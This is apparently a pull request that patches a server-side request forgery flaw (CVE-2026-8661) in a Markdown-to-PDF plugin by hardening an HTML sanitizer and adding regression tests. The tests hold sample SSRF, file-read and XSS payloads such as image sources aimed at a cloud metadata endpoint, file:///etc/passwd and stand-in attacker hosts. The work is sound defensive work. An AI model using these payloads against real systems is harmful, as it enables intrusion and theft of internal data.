### PR TITLE
[SOAR-21653] Markdown plugin resolved a server-side request forgery issue

### DIFF
--- a/plugins/markdown/.CHECKSUM
+++ b/plugins/markdown/.CHECKSUM
@@ -1,7 +1,7 @@
 {
-	"spec": "9fec04bd4b15e892848d973b1fbc0a8d",
-	"manifest": "930d0f11a23892cfd3b47a2aa6e697aa",
-	"setup": "54e74053ec7eb39651be7b9b900cf4a2",
+	"spec": "9cc4121d76c85369fb374156cecdaab5",
+	"manifest": "dfb754e0b162faa1cd6478a2d7f6d2f2",
+	"setup": "4451e2f293d22e300ca1afa21eafd728",
 	"schemas": [
 		{
 			"identifier": "html_to_markdown/schema.py",

--- a/plugins/markdown/bin/icon_markdown
+++ b/plugins/markdown/bin/icon_markdown
@@ -6,7 +6,7 @@ from sys import argv
 
 Name = "Markdown"
 Vendor = "rapid7"
-Version = "4.0.1"
+Version = "4.0.2"
 Description = "[Markdown](https://en.wikipedia.org/wiki/Markdown) is a lightweight markup language with plain text formatting syntax. This plugin utilizes [pandoc](https://pandoc.org/) via [pypandoc](https://pypi.python.org/pypi/pypandoc/) to manipulate Markdown content"
 
 

--- a/plugins/markdown/help.md
+++ b/plugins/markdown/help.md
@@ -186,6 +186,7 @@ Example output:
 
 # Version History
 
+* 4.0.2 - Resolved a server-side request forgery issue in the markdown_to_pdf action that could allow SSRF via crafted Markdown input (CVE-2026-8661)
 * 4.0.1 - Update SDK to version 6.6.0
 * 4.0.0 - Resolved an issue in the markdown_to_pdf action where the PDF rendering engine did not restrict script execution, which could allow server-side request forgery via crafted Markdown input (CVE-2026-8661) | Update SDK to version 6.4.3
 * 3.1.4 - `Markdown to PDF` - Fix issue which produced blank PDF files

--- a/plugins/markdown/icon_markdown/actions/markdown_to_pdf/action.py
+++ b/plugins/markdown/icon_markdown/actions/markdown_to_pdf/action.py
@@ -8,9 +8,14 @@ from .schema import MarkdownToPdfInput, MarkdownToPdfOutput, Output, Input, Comp
 from insightconnect_plugin_runtime.exceptions import PluginException
 from typing import Dict
 
-# --disable-javascript eliminates XSS and script execution attack vectors
+# Defense-in-depth flags for wkhtmltopdf: --disable-javascript blocks script execution,
+# --disable-local-file-access blocks file:// SSRF, load-error-handling ignores fetches
+# blocked by the sanitizer so a stripped resource does not abort the render.
 PDF_OPTIONS = {
-    "disable-javascript": None,  # Disable JavaScript execution in wkhtmltopdf
+    "disable-javascript": None,
+    "disable-local-file-access": None,
+    "load-error-handling": "ignore",
+    "load-media-error-handling": "ignore",
 }
 
 

--- a/plugins/markdown/icon_markdown/util/sanitizer.py
+++ b/plugins/markdown/icon_markdown/util/sanitizer.py
@@ -134,16 +134,16 @@ def sanitize_html(html_content: str) -> str:
 
     for tag in reversed(soup.find_all(True)):
         if tag.name in DENIED_TAGS:
-            logger.warning(f"Sanitizing HTML: encoded <{tag.name}> tag")
+            logger.warning("Sanitizing HTML: encoded <%s> tag", tag.name)
             tag.replace_with(_encode_tag(tag))
             continue
         denied_attrs = [attr for attr in tag.attrs if attr.lower() in DENIED_ATTRIBUTES]
         if denied_attrs:
-            logger.warning(f"Sanitizing HTML: encoded <{tag.name}> tag with attributes {denied_attrs}")
+            logger.warning("Sanitizing HTML: encoded <%s> tag with attributes %s", tag.name, denied_attrs)
             tag.replace_with(_encode_tag(tag))
             continue
         if _has_unsafe_url_attribute(tag):
-            logger.warning(f"Sanitizing HTML: encoded <{tag.name}> tag with disallowed URL scheme")
+            logger.warning("Sanitizing HTML: encoded <%s> tag with disallowed URL scheme", tag.name)
             tag.replace_with(_encode_tag(tag))
 
     return soup.decode(formatter=None)

--- a/plugins/markdown/icon_markdown/util/sanitizer.py
+++ b/plugins/markdown/icon_markdown/util/sanitizer.py
@@ -1,11 +1,12 @@
 import logging
 from typing import Set
 from html import escape
+from urllib.parse import urlparse
 from bs4 import BeautifulSoup, NavigableString
 
 logger = logging.getLogger(__name__)
 
-# HTML tags to be encoded
+# HTML tags to be encoded (resource-loading, redirect, and script vectors)
 DENIED_TAGS: Set[str] = {
     "script",
     "iframe",
@@ -13,16 +14,62 @@ DENIED_TAGS: Set[str] = {
     "embed",
     "link",
     "style",
+    "meta",
+    "base",
+    "svg",
+    "math",
+    "video",
+    "audio",
+    "source",
+    "track",
+    "picture",
+    "form",
+    "input",
 }
 
-# HTML Attributes to be encoded (event handlers)
+# HTML Attributes to be encoded (event handlers + inline CSS)
 DENIED_ATTRIBUTES: Set[str] = {
     "onload",
     "onerror",
     "onabort",
     "onunload",
     "onbeforeunload",
+    "onclick",
+    "onmouseover",
+    "onmouseout",
+    "onmousedown",
+    "onmouseup",
+    "onfocus",
+    "onblur",
+    "onchange",
+    "onsubmit",
+    "onreset",
+    "onkeydown",
+    "onkeyup",
+    "onkeypress",
+    "oninput",
+    "onanimationstart",
+    "onanimationend",
+    "ontransitionend",
+    "style",
 }
+
+# Attributes dereferenced by wkhtmltopdf/QtWebKit at render time (real SSRF sinks).
+# Only inline data: URIs and relative URLs are safe here.
+RESOURCE_URL_ATTRS: Set[str] = {
+    "src",
+    "poster",
+    "background",
+    "srcset",
+    "xlink:href",
+    "ping",
+}
+RESOURCE_URL_ALLOWED_SCHEMES: Set[str] = {"data"}
+
+# Attributes that produce a clickable hyperlink or form target in the final PDF;
+# they are not fetched at render time, so ordinary web schemes are safe.
+LINK_URL_ATTRS: Set[str] = {"href", "action", "formaction"}
+LINK_URL_ALLOWED_SCHEMES: Set[str] = {"http", "https", "mailto"}
 
 
 def _encode_tag(tag) -> NavigableString:
@@ -30,13 +77,49 @@ def _encode_tag(tag) -> NavigableString:
     return NavigableString(escape(str(tag), quote=False))
 
 
+def _url_scheme(value: str) -> str:
+    if not value:
+        return ""
+    return urlparse(value.strip()).scheme.lower()
+
+
+def _is_disallowed(value: str, allowed_schemes: Set[str]) -> bool:
+    """A URL is disallowed when it has an explicit scheme outside the allowlist.
+
+    Relative URLs (no scheme) are considered safe because wkhtmltopdf without a
+    base URL cannot dereference them.
+    """
+    scheme = _url_scheme(value)
+    if not scheme:
+        return False
+    return scheme not in allowed_schemes
+
+
+def _has_unsafe_url_attribute(tag) -> bool:
+    for attr_name, attr_value in tag.attrs.items():
+        name = attr_name.lower()
+        if name in RESOURCE_URL_ATTRS:
+            allowed = RESOURCE_URL_ALLOWED_SCHEMES
+        elif name in LINK_URL_ATTRS:
+            allowed = LINK_URL_ALLOWED_SCHEMES
+        else:
+            continue
+        values = attr_value if isinstance(attr_value, list) else [attr_value]
+        for value in values:
+            if isinstance(value, str) and _is_disallowed(value, allowed):
+                return True
+    return False
+
+
 def sanitize_html(html_content: str) -> str:
     """
     Sanitize HTML content by encoding potentially dangerous elements.
 
-    This function uses an explicit denylist approach:
-    1. Encodes tags: script, iframe, object, embed, link, style
-    2. Encodes tags with event handler attributes
+    Denylist-based sanitization:
+    1. Encodes tags known to execute scripts, load remote resources, or redirect.
+    2. Encodes tags carrying denied attributes (event handlers, inline style).
+    3. Encodes tags whose URL-bearing attributes point to a disallowed scheme
+       (e.g. file:, javascript:, gopher:); relative URLs are preserved.
 
     Args:
         html_content: The HTML content to sanitize
@@ -51,11 +134,16 @@ def sanitize_html(html_content: str) -> str:
 
     for tag in reversed(soup.find_all(True)):
         if tag.name in DENIED_TAGS:
-            logger.warning("Sanitizing HTML: encoded <%s> tag", tag.name)
+            logger.warning(f"Sanitizing HTML: encoded <{tag.name}> tag")
             tag.replace_with(_encode_tag(tag))
-        elif any(attr.lower() in DENIED_ATTRIBUTES for attr in tag.attrs):
-            event_handlers = [attr for attr in tag.attrs if attr.lower() in DENIED_ATTRIBUTES]
-            logger.warning("Sanitizing HTML: encoded <%s> tag with attributes %s", tag.name, event_handlers)
+            continue
+        denied_attrs = [attr for attr in tag.attrs if attr.lower() in DENIED_ATTRIBUTES]
+        if denied_attrs:
+            logger.warning(f"Sanitizing HTML: encoded <{tag.name}> tag with attributes {denied_attrs}")
+            tag.replace_with(_encode_tag(tag))
+            continue
+        if _has_unsafe_url_attribute(tag):
+            logger.warning(f"Sanitizing HTML: encoded <{tag.name}> tag with disallowed URL scheme")
             tag.replace_with(_encode_tag(tag))
 
     return soup.decode(formatter=None)

--- a/plugins/markdown/plugin.spec.yaml
+++ b/plugins/markdown/plugin.spec.yaml
@@ -4,7 +4,7 @@ products: [insightconnect]
 name: markdown
 title: Markdown
 description: '[Markdown](https://en.wikipedia.org/wiki/Markdown) is a lightweight markup language with plain text formatting syntax. This plugin utilizes [pandoc](https://pandoc.org/) via [pypandoc](https://pypi.python.org/pypi/pypandoc/) to manipulate Markdown content'
-version: 4.0.1
+version: 4.0.2
 connection_version: 3
 vendor: rapid7
 support: community
@@ -32,6 +32,7 @@ hub_tags:
   keywords: [markdown, html, pdf]
   features: []
 version_history:
+  - "4.0.2 - Resolved a server-side request forgery issue in the markdown_to_pdf action that could allow SSRF via crafted Markdown input (CVE-2026-8661)"
   - 4.0.1 - Update SDK to version 6.6.0
   - 4.0.0 - Resolved an issue in the markdown_to_pdf action where the PDF rendering engine did not restrict script execution, which could allow server-side request forgery via crafted Markdown input (CVE-2026-8661) | Update SDK to version 6.4.3
   - 3.1.4 - `Markdown to PDF` - Fix issue which produced blank PDF files

--- a/plugins/markdown/setup.py
+++ b/plugins/markdown/setup.py
@@ -3,7 +3,7 @@ from setuptools import setup, find_packages
 
 setup(
     name="markdown-rapid7-plugin",
-    version="4.0.1",
+    version="4.0.2",
     description="[Markdown](https://en.wikipedia.org/wiki/Markdown) is a lightweight markup language with plain text formatting syntax. This plugin utilizes [pandoc](https://pandoc.org/) via [pypandoc](https://pypi.python.org/pypi/pypandoc/) to manipulate Markdown content",
     author="rapid7",
     author_email="",

--- a/plugins/markdown/unit_test/test_markdown_to_pdf.py
+++ b/plugins/markdown/unit_test/test_markdown_to_pdf.py
@@ -57,3 +57,12 @@ class TestMarkdownToPdf(TestCase):
         with self.assertRaises(PluginException) as context:
             self.action.run(input_params)
         self.assertEqual(context.exception.cause, exception)
+
+    def test_pdf_options_contain_ssrf_mitigations(self):
+        """Ensure defense-in-depth wkhtmltopdf flags are set on every render."""
+        from icon_markdown.actions.markdown_to_pdf.action import PDF_OPTIONS
+
+        self.assertIn("disable-javascript", PDF_OPTIONS)
+        self.assertIn("disable-local-file-access", PDF_OPTIONS)
+        self.assertEqual(PDF_OPTIONS.get("load-error-handling"), "ignore")
+        self.assertEqual(PDF_OPTIONS.get("load-media-error-handling"), "ignore")

--- a/plugins/markdown/unit_test/test_markdown_to_pdf.py
+++ b/plugins/markdown/unit_test/test_markdown_to_pdf.py
@@ -5,6 +5,7 @@ sys.path.append(os.path.abspath("../"))
 from parameterized import parameterized
 from unittest import TestCase
 from icon_markdown.actions.markdown_to_pdf import MarkdownToPdf
+from icon_markdown.actions.markdown_to_pdf.action import PDF_OPTIONS
 from icon_markdown.actions.markdown_to_pdf.schema import Input, Output
 from insightconnect_plugin_runtime.exceptions import PluginException
 from unittest import mock
@@ -60,8 +61,6 @@ class TestMarkdownToPdf(TestCase):
 
     def test_pdf_options_contain_ssrf_mitigations(self):
         """Ensure defense-in-depth wkhtmltopdf flags are set on every render."""
-        from icon_markdown.actions.markdown_to_pdf.action import PDF_OPTIONS
-
         self.assertIn("disable-javascript", PDF_OPTIONS)
         self.assertIn("disable-local-file-access", PDF_OPTIONS)
         self.assertEqual(PDF_OPTIONS.get("load-error-handling"), "ignore")

--- a/plugins/markdown/unit_test/test_sanitizer.py
+++ b/plugins/markdown/unit_test/test_sanitizer.py
@@ -42,10 +42,10 @@ class TestSanitizer(TestCase):
                 '<style>body{background:url("javascript:alert(1)")}</style><p>Text</p>',
                 '&lt;style&gt;body{background:url("javascript:alert(1)")}&lt;/style&gt;<p>Text</p>',
             ),
-            # Test event handler encoding - onclick (not in deny list, so preserved)
+            # Test event handler encoding - onclick (now in deny list)
             (
                 "<p onclick=\"alert('xss')\">Click me</p>",
-                "<p onclick=\"alert('xss')\">Click me</p>",
+                "&lt;p onclick=\"alert('xss')\"&gt;Click me&lt;/p&gt;",
             ),
             # Test event handler encoding - onerror
             (
@@ -67,10 +67,55 @@ class TestSanitizer(TestCase):
                 '<a href="https://example.com" title="Example">Link</a>',
                 '<a href="https://example.com" title="Example">Link</a>',
             ),
-            # Test that images are preserved with safe attributes
+            # Test that images with relative URLs are preserved
             (
                 '<img src="image.png" alt="Description">',
                 '<img alt="Description" src="image.png"/>',
+            ),
+            # Test that images with data: URI are preserved (inline base64)
+            (
+                '<img src="data:image/png;base64,iVBOR"/>',
+                '<img src="data:image/png;base64,iVBOR"/>',
+            ),
+            # SSRF regression: img with external http URL is encoded
+            (
+                '<p><img src="http://attacker.com/beacon.png"/></p>',
+                '<p>&lt;img src="http://attacker.com/beacon.png"/&gt;</p>',
+            ),
+            # SSRF regression: img targeting cloud metadata endpoint is encoded
+            (
+                '<img src="http://169.254.169.254/latest/meta-data/">',
+                '&lt;img src="http://169.254.169.254/latest/meta-data/"/&gt;',
+            ),
+            # LFI regression: file:// scheme is encoded
+            (
+                '<img src="file:///etc/passwd"/>',
+                '&lt;img src="file:///etc/passwd"/&gt;',
+            ),
+            # XSS regression: javascript: scheme is encoded
+            (
+                '<img src="javascript:alert(1)"/>',
+                '&lt;img src="javascript:alert(1)"/&gt;',
+            ),
+            # mailto: link is preserved
+            (
+                '<a href="mailto:user@example.com">contact</a>',
+                '<a href="mailto:user@example.com">contact</a>',
+            ),
+            # SSRF regression: inline style with url() is encoded (style is in DENIED_ATTRIBUTES)
+            (
+                '<div style="background:url(http://attacker/)">x</div>',
+                '&lt;div style="background:url(http://attacker/)"&gt;x&lt;/div&gt;',
+            ),
+            # SSRF regression: video with external src is encoded
+            (
+                '<video src="http://internal/"></video>',
+                '&lt;video src="http://internal/"&gt;&lt;/video&gt;',
+            ),
+            # SSRF regression: meta refresh redirect is encoded
+            (
+                '<meta http-equiv="refresh" content="0;url=http://internal/">',
+                '&lt;meta content="0;url=http://internal/" http-equiv="refresh"/&gt;',
             ),
             # Test table tags are preserved
             (
@@ -147,10 +192,32 @@ class TestSanitizer(TestCase):
         self.assertIn("onload", result)
         self.assertIn("Content", result)
 
-    def test_form_elements_preserved(self):
-        """Test that form elements are preserved (not in denylist)."""
-        html = '<form action="/submit"><input type="text" name="field"><button>Submit</button></form>'
+    def test_form_elements_denied(self):
+        """Test that form elements are encoded (SSRF vector via action=)."""
+        html = '<form action="http://attacker/steal"><button>Submit</button></form>'
         result = sanitize_html(html)
-        self.assertIn("<form", result)
-        self.assertIn("<input", result)
-        self.assertIn("<button>", result)
+        self.assertNotIn("<form", result)
+        self.assertIn("&lt;form", result)
+        self.assertIn("&lt;/form&gt;", result)
+
+    def test_image_with_disallowed_scheme_is_encoded(self):
+        """Regression test for SSRF via img src with attacker-controlled URL."""
+        html = '<p>Report</p><img src="http://169.254.169.254/latest/meta-data/">'
+        result = sanitize_html(html)
+        self.assertNotIn('<img src="http://169.254', result)
+        self.assertIn("&lt;img", result)
+        self.assertIn("<p>Report</p>", result)
+
+    def test_image_with_data_uri_is_preserved(self):
+        """Inline base64 images (data: URI) remain functional after the SSRF fix."""
+        html = '<img src="data:image/png;base64,iVBORw0KGgoAAAA" alt="inline">'
+        result = sanitize_html(html)
+        self.assertIn("data:image/png;base64", result)
+        self.assertNotIn("&lt;img", result)
+
+    def test_style_attribute_is_encoded(self):
+        """Inline style attribute is encoded to prevent CSS-based SSRF via url()."""
+        html = '<div style="background:url(http://attacker/beacon)">x</div>'
+        result = sanitize_html(html)
+        self.assertIn("&lt;div", result)
+        self.assertIn("style", result)


### PR DESCRIPTION
## 🎫 Ticket
https://rapid7.atlassian.net/browse/SOAR-21653

## 🧩 Type of Change
<!-- Choose the type of change -->
- [ ] Feature
- [ ] Bug fix
- [✅ ] Other

## 🧠 Background & Motivation
Resolving a server-side request forgery issue in the markdown_to_pdf action that could allow SSRF via crafted Markdown input (CVE-2026-8661)

## ✨ What Changed
- Version bump to 4.0.2
- Additional pdf options, denied tags and attributes
- Additional unit tests

## 🧪 Testing
- Unit tests
- Manual testing steps
